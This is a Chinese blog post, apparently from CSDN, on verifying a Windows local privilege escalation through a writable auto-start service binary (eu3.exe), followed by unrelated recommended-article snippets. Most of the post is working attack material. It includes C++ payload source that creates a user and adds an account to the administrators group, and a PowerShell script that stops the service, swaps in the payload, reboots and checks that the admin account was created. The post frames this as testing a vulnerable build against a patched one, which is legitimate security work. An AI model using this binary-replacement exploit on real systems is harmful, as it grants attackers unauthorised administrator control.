LPE 漏洞验证

已于 2024-11-05 17:00:36 修改
阅读量523 收藏 3
点赞数 5
分类专栏: 安全 window 文章标签: 安全 自动化
于 2024-11-04 22:10:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44342166/article/details/143494753
版权

一、什么是LPE 漏洞

LPE 是指攻击者利用系统漏洞将普通用户权限提升到系统管理员或SYSTEM权限的安全漏洞。在Windows系统中最典型的就是从标准用户提升到SYSTEM/Administrator权限。

二、验证思路

被测应用: eu3.exe(admin 安装运行,服务起来后,会自启动)

用户:user(在admin 组,有管理员权限)、seewo(在users 组,没有管理员权限)

过程:seewo 用户创建一个恶意文件 adduser.exe,把eu3.exe 给替换,重启服务或系统,触发恶意文件被执行(让替换后的 eu3.exe 运行起来),利用了管理员权限创建了一个 用户 

三、准备工作

1、查看所有第三方安装服务(主要找到 eu3.exe)

2、获取window 本地的用户权限情况 和 用icacls 枚举关联的权限

系统上的 BUILTIN\Administrators(F) Administrators 对该  eu3.exe 有完全的读写权限(括号中的F 则为完全控制可以替换),如果新增一个用户 seewo,把eu3.exe 替换成恶意二进制文件(users 组的seewo没有权限运行),然后通过重启服务或重启计算机来触发这个恶意二进制文件

3、在Windows创建用户并添加到管理员组

# 创建用户(设置密码为123456)
net user seewo 123456 /add
 
# 验证用户创建和组成员身份
net user seewo
 
# 检查当前权限
whoami /groups

# 删除用户
net user seewo /delete

4、创建替换的二进制文件,编译成 exe 文件

创建用户需要admin 的权限,如果运行并创建成功成功,说明程序替换并执行成功。

#include <cstdlib>
#include <iostream>
 
int main() {
    int result;
 
    // 执行系统命令
    result = std::system("net user user_test 123456 /add");
    if (result != 0) {
        std::cerr << "添加用户失败" << std::endl;
    }
 
    result = std::system("net localgroup administrators evil /add");
    if (result != 0) {
        std::cerr << "添加到管理员组失败" << std::endl;
    }
 
    return 0;
}

创建 adduser.cpp 文件,在 vs 2022 的编译环境下编译成 adduser.exe 文件

编译命令器 在对应的目录下,运行命令


cl /EHsc adduser.cpp /Fe:adduser.exe

四、验证过程

1、查找 被测进程路径对应的服务
# 查看所有运行的服务
Get-Service | Where-Object {$_.Status -eq "Running"} | Format-Table Name, DisplayName, Status
 
# 按进程路径查找服务
$targetPath = "C:\ProgramData\eu3.exe"
Get-WmiObject win32_service | Where-Object {$_.PathName -like "*$targetPath*"} | Format-Table Name, DisplayName, PathName, StartName

2、编写 PowerShell 脚本,利用eu3 的admin 运行权限,执行 adduser.exe 文件,创建admin 组用户

1)查找 被测进程路径对应的服务

# 查看所有运行的服务
Get-Service | Where-Object {$_.Status -eq "Running"} | Format-Table Name, DisplayName, Status
 
# 按进程路径查找服务
$targetPath = "C:\ProgramData\eu3.exe"
Get-WmiObject win32_service | Where-Object {$_.PathName -like "*$targetPath*"} | Format-Table Name, DisplayName, PathName, StartName
 
# 查看要恶意替换文件的执行权限
icacls "C:\ProgramData\adduser.exe"
 
$targetPath = "C:\ProgramData\adduser.exe"
Get-WmiObject win32_service | Where-Object {$_.PathName -like "*$targetPath*"} | Format-Table Name, DisplayName, PathName, StartName

2)需要把adduser.exe 的执行读写权限开放给 seewo 这个users 组的用户

把adduser.exe放到对应的目录下,右键adduser.exe 【属性】-->【安全】,添加文件权限

3)编写powershell 脚本

# Verify-Replacement.ps1
 
# 编码设置
$OutputEncoding = [System.Text.Encoding]::UTF8
$PSDefaultParameterValues['*:Encoding'] = 'utf8'
 
# 参数配置
$OriginalExePath = "C:\ProgramData\eu3.exe"
$NewExePath = "C:\ProgramData\adduser.exe"
$BackupPath = "C:\ProgramData\eu3.exe.bak"
$RenamedOriginalPath = "C:\ProgramData\test.exe"
$LogPath = "C:\ProgramData\replace_test.log"
$ServiceName = "eu3"
$RebootFlagFile = "C:\ProgramData\reboot_flag.txt"
 
# 确保日志目录存在
$LogDir = Split-Path $LogPath -Parent
if (-not (Test-Path $LogDir)) {
    New-Item -ItemType Directory -Path $LogDir -Force | Out-Null
}
 
function Write-Log {
    param(
        [string]$Message,
        [string]$Type = "INFO"
    )
     
    $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
    $logMessage = "[$timestamp] [$Type] $Message"
    Add-Content -Path $LogPath -Value $logMessage -Encoding UTF8
    Write-Host $logMessage
}
 
 
function Stop-ServiceSafe {
    param(
        [string]$ServiceName
    )
    try {
        $service = Get-Service -Name $ServiceName -ErrorAction Stop
        if ($service.Status -eq 'Running') {
            Write-Log "正在停止服务 $ServiceName..."
            Stop-Service -Name $ServiceName -Force
            Start-Sleep -Seconds 2
        }
        return $true
    }
    catch {
        Write-Log "停止服务失败: $_" "ERROR"
        return $false
    }
}
 
function Replace-File {
    try {
        # 1. 首先停止服务
        if (-not (Stop-ServiceSafe -ServiceName $ServiceName)) {
            throw "无法停止服务"
        }
 
        # 2. 停止相关进程
        $processes = Get-Process | Where-Object {$_.Path -eq $OriginalExePath}
        foreach ($process in $processes) {
            Write-Log "正在停止进程: $($process.Id)"
            Stop-Process -Id $process.Id -Force
        }
        Start-Sleep -Seconds 2
 
        # 3. 重命名原始文件为
        Write-Log "正在重命名原始文件为test.ext..."
        if (Test-Path $RenamedOriginalPath) {
            Remove-Item $RenamedOriginalPath -Force
        }
        Move-Item -Path $OriginalExePath -Destination $RenamedOriginalPath -Force
 
        # 4. 更改新文件为源文件名
        Write-Log "Copy-Item 正在替换源文件的内容,eu3.exe的内容被替换成伪造的文件adduser.exe的内容 ..."
 
        Copy-Item -Path $NewExePath -Destination $OriginalExePath -Force
 
        # 5. 设置新文件权限
        $acl = Get-Acl $NewExePath
        Set-Acl -Path $OriginalExePath -AclObject $acl
 
        return $true
    }
    catch {
        Write-Log "文件替换失败: $_" "ERROR"
        return $false
    }
}
 
function Start-ServiceSafe {
    param(
        [string]$ServiceName
    )
    try {
        Write-Log "正在启动服务 $ServiceName..."
        Start-Service -Name $ServiceName
        Start-Sleep -Seconds 5
        $service = Get-Service -Name $ServiceName
        Write-Log "服务状态: $($service.Status)"
        return $service.Status -eq 'Running'
    }
    catch {
        Write-Log "启动服务失败: $_" "ERROR"
        return $false
    }
}
 
# 验证用户创建和组成员身份
function Verify-UserCreation {
    param(
        [string]$Username = "user_test"
    )
     
    try {
        Write-Log "开始验证用户 $Username 的创建状态和组成员身份..."
         
        # 检查用户是否存在
        $user = Get-LocalUser -Name $Username -ErrorAction SilentlyContinue
        if ($user) {
            Write-Log "用户 $Username 已成功创建"
             
            # 获取用户所属的组
            $groups = Get-LocalGroup | Where-Object { (Get-LocalGroupMember $_.Name -ErrorAction SilentlyContinue).Name -contains $user.Name }
             
            if ($groups) {
                Write-Log "用户 $Username 属于以下组:"
                foreach ($group in $groups) {
                    Write-Log " - $($group.Name)"
                }
            } else {
                Write-Log "用户 $Username 不属于任何本地组"
            }
             
            return $true
        } else {
            Write-Log "用户 $Username 未创建" "WARNING"
            return $false
        }
    }
    catch {
        Write-Log "验证用户创建失败: $_" "ERROR"
        return $false
    }
}
 
function Get-CurrentUser {
    try {
        $whoamiOutput = whoami /all
        $userInfo = $whoamiOutput | Select-String "用户名:|User Name:"
        $userPrivileges = $whoamiOutput | Select-String "特权名称:|Privilege Name:"
         
        Write-Log "当前用户信息:"
        Write-Log $userInfo
        Write-Log "用户特权:"
        foreach ($privilege in $userPrivileges) {
            Write-Log $privilege
        }
         
        return $whoamiOutput
    }
    catch {
        Write-Log "获取当前用户信息失败: $_" "ERROR"
        return $null
    }
}
 
 
function Restart-System {
    Write-Log "系统即将重启..."
    Set-Content -Path $RebootFlagFile -Value "Reboot initiated"
    Start-Process "shutdown.exe" -ArgumentList "/r /t 0" -NoNewWindow
}
 
# 主验证流程
try {
    if (Test-Path $RebootFlagFile) {
        Write-Log "系统重启后继续执行..."
        Remove-Item $RebootFlagFile -Force
    } else {
        Write-Log "开始验证流程"
        Write-Log "-------------------"
 
         # 获取并记录当前用户信息
        Write-Log "正在获取当前用户信息..."
        $currentUserInfo = Get-CurrentUser
        if ($currentUserInfo -eq $null) {
            Write-Log "无法获取当前用户信息,请检查权限" "WARNING"
        }
     
        # 1. 检查文件
        Write-Log "正在检查文件..."
        if (-not (Test-Path $OriginalExePath)) {
            throw "原始文件不存在"
        }
        if (-not (Test-Path $NewExePath)) {
            throw "替换文件不存在"
        }
     
        # 2. 备份原始文件
        Write-Log "正在备份原始文件..."
        Copy-Item -Path $OriginalExePath -Destination $BackupPath -Force -ErrorAction Stop
        Write-Log "备份完成: $BackupPath"
     
        # 3. 替换文件
        Write-Log "正在替换文件..."
        if (-not (Replace-File)) {
            throw "文件替换失败"
        }
     
        # 4. 启动服务
        if (-not (Start-ServiceSafe -ServiceName $ServiceName)) {
            throw "服务启动失败"
        }
 
        # 5. 重启系统
        Restart-System
        exit
    }
 
    # 6. 验证用户创建和组成员身份
    if (-not (Verify-UserCreation)) {
        throw "用户验证失败"
    }
     
    Write-Log "验证完成"
    Write-Log "-------------------"
}
catch {
    Write-Log "验证过程失败: $_" "ERROR"
     
    # 恢复流程
    Write-Log "开始恢复流程..."
     
    # 停止服务
    Stop-ServiceSafe -ServiceName $ServiceName
     
    # 恢复文件
    if (Test-Path $RenamedOriginalPath) {
        Write-Log "正在恢复原始文件..."
        if (Test-Path $OriginalExePath) {
            Remove-Item $OriginalExePath -Force
        }
        Move-Item -Path $RenamedOriginalPath -Destination $OriginalExePath -Force
        Write-Log "原始文件已恢复"
    }
    elseif (Test-Path $BackupPath) {
        Write-Log "正在从备份恢复..."
        Copy-Item -Path $BackupPath -Destination $OriginalExePath -Force
        Write-Log "已从备份恢复"
    }
     
    # 重启服务
    Start-ServiceSafe -ServiceName $ServiceName
}
finally {
    # 清理工作
    Write-Log "正在进行清理..."
    if (Test-Path $BackupPath) {
        Remove-Item $BackupPath -Force -ErrorAction SilentlyContinue
        Write-Log "已删除备份文件"
    }
    if (Test-Path $RebootFlagFile) {
        Remove-Item $RebootFlagFile -Force -ErrorAction SilentlyContinue
        Write-Log "已删除重启标志文件"
    }
}

4)安装有漏洞的包,运行脚本

# 在文件所在目录下,运行验证脚本
.\Verify-Replacement.ps1

运行的过程中会触发系统重启,重启后查看用户创建情况,用户创建成功,漏洞复现

5)安装没有漏洞的包,运行脚本

运行的过程中,修改文件被拦截,无法访问后续的文件

calibre版图验证及寄生参数的提取后仿真
YYP_8020的博客
01-14 2万+
这一篇主要是说一下版图的Run DRC 和Run LVS验证。 接反向器的版图设计后,开始Run DRC和LVS。 打开之前画好的layout,在菜单栏中点calibre—Run DRC 选择DRC Rules File文件 下一步点Run DRC,别的基本不用去改变,选择默认就行。 在跳出上图的对话框中修改自己的错误即可,DRC就通过了。 接下来Run LVS,一样在菜单栏中点calibre...
集成电路版图学习笔记1----版图基本知识
热门推荐
羊藤枝的博客
08-29 7万+
集成电路设计流程: Created with Raphaël 2.1.2设 计 方 案定 义 结 构 功能设计与仿真电路设计与仿真版图设计与仿真后 仿 真 流片与芯片测试大 规 模 生 产 由上图版图设计属于后端设计部分。 所谓集成电路版图设计就是指将电路设计电路图或电路描述语言映射到物理描述层面。 版图工程师的职责包括:芯片物理结构分析,逻辑分析,建立后端设计流程,版图...
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
存储器电路设计学习记录之 版图验证DRC LVS LPE 及后仿扫盲
coin的博客
03-23 1万+
目录版图设计步骤版图设计方法分类版图设计完成后的验证工作1.设计规则检查 (DRC)2.版图与电路图一致性检查 (LVS)3.电学规则检查(ERC)4.版图寄生参数提取 (LPE)功能仿真(后仿)1. 连写连读2. 连续读写3. 交叉读写4. march C+ 算法 本文主要参考自2007届 西电 杨清宝 的**《嵌入式 SRAM 的高速、低功耗设计及优化》**硕士论文,知网下载。 版图设计步骤 整个版图的设计工作可以分为划分(partition)、布图规划 (floorplanning),布局(place
CVE-2021-4034 Pkexec LPE原理精析
「鸿渐之翼」的博客
02-26 5614
国外Qualys安全团队在CVE平台披露了Linux系统Polkit中的pkexec组件存在的本地权限提升漏洞(CVE-2021-4034)。Polkit默认安装在各个主要的 Linux 发行版本上(诸如Ubuntu、Debian、Fedora等知名Linux发型版本),pkexec程序对传入参数未过滤,攻击者可以将环境变量bash作为命令执行,从而诱导 pkexec 执行任意代码,利用成功可导致非特权用户获得管理员r
探索Bad Spin:Android Binder LPE 漏洞利用工具
gitblog_00012的博客
06-04 363
探索Bad Spin:Android Binder LPE 漏洞利用工具 badspinBad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)项目地址:https://gitcode.com/gh_mirrors/ba/badspin 项目简介 欢迎来到Bad Spin的世界,这是一个由Moshe Kol编写的...
cve-漏洞分析
若有战,召必回
12-18 1375
这样一来,指针指向的地址是否合法,以及指针内容的大小均不被检查,所以此处的指针可以写入任意地址中。在2018年的Bluehat上,Kaspersky研究员提出了一种很有趣的利用技巧,对于NtReadVirtualMemory和NtWriteVirtualMemory这类函数,在PreviouseMode为UserMode的时候,它会检查当前访问的地址空间是否为用户态可访问的空间,但当PreviouseMode为KernelMode的时候,并不会进行这类检查。这里的csc.sys即为对应服务的模块。
CVE-2021-31166 漏洞复现
miko's blog
10-25 1579
CVE-2021-31166漏洞复现漏洞导读漏洞版本漏洞复现总结 CVE-2021-31166 Exploit https://github.com/ConMiko/CVE-2021-31166-exploit 官方补丁 https://msrc.microsoft.com/update-guide/en-us/releaseNote/2021-May 漏洞导读 CVE-2021-31166 (HTTP Protocol Stack Remote Code Execution Vulnerabilit
SMB漏洞修复
lopowh的博客
03-11 2086
,攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制。(文件共享与打印服务)中,目前技术细节暂不公布,对于漏洞的利用无需用户验证,通过构造恶意请求即可触发导致任意代码执行,系统受到非授权控制。日,某国外安全公司发布了一个近期微软安全补丁包所涉及漏洞的综述,其中谈到了一个威胁等级被标记为。系统,考虑到相关设备的数量级,潜在威胁较大。方法一:给对应的系统打微软出的最新补丁。的设备,理论上存在蠕虫化的可能性。使用两台虚拟机作为漏洞演示,一台。
day5-HVV 某Windows 0day漏洞在anwang出售,可直接打穿系统
智慧网络病毒猎手的博客
07-31 1906
众里寻他千百度,蓦然回首,那人却在,灯火阑珊处
CVE-2020-0796:CVE-2020-0796-Windows SMBv3 LPE攻击#SMBGhost
03-19
标签中的"poc"指的是概念验证代码,这是一种简化的攻击示例,证明了漏洞的存在和可利用性。在"CVE-2020-0796-master"压缩包中,可能包含了研究人员编写的POC代码,用于演示如何触发和利用这个漏洞。这些代码对于安全...
CVE-2021-36934:Windows提权漏洞1
08-03
CVE-2021-36934(也被称为HiveNightmare)是存在于Windows操作系统中的一个高危本地权限提升(Local Privilege Escalation, LPE漏洞。该漏洞首次被公开报道于2021年7月27日。自Windows 10 Build 1809起,非管理员...
TDengine 安全部署配置建议
TDengine(老段)专注时序数据库领域
05-19 1161
数据安全是 TDengine 产品的一项关键指标,这些措施旨在保护 TDengine 部署免受未经授权的访问和数据泄露,同时保持性能和功能。但 TDengine 自身的安全配置不是生产中的唯一保障,结合用户业务系统制定更加匹配客户需求的解决方案更加重要。
保密行业工作沟通安全:吱吱软件的“四重防泄露”设计
Zhizhitalk的博客
05-20 417
工作沟通安全威胁是指在金融、科技、医疗等保密行业中,错发、泄露、窃取一条消息或者一份文件,都有可能引发数据安全灾难性失控。以往的即时通讯软件仅依赖单一的加密手段,无法满足保密行业从发送、传输到接受全链路加密的更高规格的数据安全要求。国产企业级别的加密通讯软件“吱吱”,凭借其“四重防泄漏”设计,正在为保密行业构建立体全方位的保护防线。
灾备认证助力构建数据资产安全防线‌
wanganshiji01的博客
05-21 724
在网络安全威胁日益复杂的背景下,灾备认证体系发挥着不可替代的关键作用。IP 地址划分与应用、灾备网络的设计、常见网络故障的定位和排查、基于存储的灾备、基于数据库的灾备、基于持续数据保护技术的灾备、基于文件的灾备、基于操作系统的灾备。灾备需求的引导与发掘、灾备方案的规划与设计、灾备方案的评估、灾备选址中的注意事项、灾备组织架构和人员、灾备设施建设和运维、灾备响应和灾难恢复、灾备制度的制订。云灾备的概念、云灾备的服务模式、跨云灾备技术、虚拟化的种类和实现方式、虚拟化技术在灾备方案设计及实施过程中的应用。
智慧化工园区安全风险管控平台建设方案(Word)
xx_123321456的博客
05-23 417
本项目旨在为XX化工园区打造一个集安全监管、封闭化管理、应急管理于一体的智慧化平台。项目背景基于政策需求、安全生产监管需求及工业互联网+安全生产的智慧应用需求,通过技术、经济和社会效益的可行性分析,确定了建设目标和内容。总体方案设计遵循统筹发展、标准规范、经济实用等原则,采用微服务架构、边缘计算、机器视觉等关键技术,构建了包括安全监管体系、封闭化管理体系、应急管理体系在内的综合平台。项目推进计划详细规划了项目组织保障、管理措施和质量保障,同时制定了全面的培训方案和验收方案,确保项目顺利实施和高效运行。售后服
2025年渗透测试面试题总结-匿名[社招]安全工程师(红队方向)2(题目+回答)
最新发布
soc的博客
05-23 752
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
腾讯游戏安全与高通合作构建PC端游安全新格局
AntiCheatExpert的博客
05-21 428
高通技术公司(中国)产品市场总监姚轶非表示:“高通技术公司与腾讯游戏在手游和端游领域有着深厚的合作,包括新技术的落地,对游戏的深度调优,游戏技术的联合市场宣发以及游戏电竞领域的合作等等,双方建立了长期的技术合作关系。此次合作中,腾讯游戏安全ACE作为行业先进的安全解决方案,通过与高通(中国)的合作,将先进的游戏安全方案与骁龙X系列紧密结合,为搭载骁龙X系列的PC设备游戏场景提供安全保障,推动游戏产业生态发展,构建PC端游安全新格局。双方的技术协同为行业提供了终端侧安全实践的新思路,推动游戏安全生态建设。
AI智能分析网关V4人员摔倒检测打造医院/工厂等多场景智能安全防护体系
Oliverro的博客
05-20 574
随着全球老龄化加剧,我国老年人口占比持续攀升,老年人摔倒伤亡事件频发,居家、养老机构等场景的摔倒防控成为社会焦点。
Win32k LPE漏洞: APT攻击的关键切入点CVE-2015-1701
Win32k LPE漏洞(CVE-2015-1701)的细节在漏洞被发现后不久就公之于众,引起了广泛的关注。这一漏洞主要影响Windows Vista及之后版本的操作系统。微软在2015年4月的补丁星期二(Patch Tuesday)中发布了针对此漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值